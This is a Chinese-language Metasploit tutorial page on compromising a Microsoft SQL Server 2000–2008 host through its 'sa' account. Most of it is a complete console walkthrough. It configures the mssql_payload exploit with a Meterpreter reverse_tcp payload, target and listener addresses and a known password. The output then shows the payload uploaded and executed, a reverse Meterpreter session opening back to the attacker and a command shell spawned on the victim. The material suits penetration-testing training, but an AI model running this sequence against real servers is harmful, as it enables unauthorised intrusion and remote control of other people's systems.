Metasploit 通过MSSQL传递有效载荷

在上一节中,我们创建了一个非常基本的模块,以更好地理解构建背后的原理。本节简要介绍如何使用MSSQL模块传递有效载荷。目前介绍的代码适用于以下Microsoft SQL Server的安装:2000,2005和2008.我们将首先介绍代码并解释这种攻击向量的工作原理,然后再从头开始。

 

当管理员首次安装MSSQL时,他们可以选择使用混合模式身份验证或基于SQL的身份验证。使用后者时,必须由管理员指定'sa'帐户的密码。'sa'帐户是SQL服务器的系统管理员,对系统具有大部分(如果不是全部)权限。猜测这个密码,无论是使用社会工程或其他手段,可以使用Metasploit这个攻击矢量并执行其他操作。在之前的模块中,我们讨论了通过查询UDP端口1434并执行字典攻击以猜测'sa'密码来发现MSSQL正在使用哪个TCP端口。

 

对于我们的目的,我们假设我们知道SQL系统管理员的帐户密码。如果您希望重新创建此攻击,您需要拥有Microsoft Windows的工作副本以及之前提到的任何MSSQL版本。mssql

 

让我们发起攻击:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL for incoming connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.10.1.103
LHOST => 10.10.1.103
msf exploit(mssql_payload) > set RHOST 172.16.153.129
RHOST => 172.16.153.129
msf exploit(mssql_payload) > set LPORT 8080
LPORT => 8080
msf exploit(mssql_payload) > set PASSWORD ihazpassword
MSSQL_PASS => ihazpassword
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 8080
[*] Warning: This module will leave QiRYOlUK.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.1.103:8080 -> 10.10.1.103:47384)

meterpreter > execute -f cmd.exe -i
Process 3740 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
    A+
发布日期:2018年06月10日 00:07:52  所属分类:Metasploit
最后更新时间:2018-06-10 00:07:52
付杰
  • ¥ 1.0元
  • 市场价:9.9元
  • ¥ 199.0元
  • 市场价:399.0元
  • ¥ 119.0元
  • 市场价:199.0元
  • ¥ 69.0元
  • 市场价:69.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: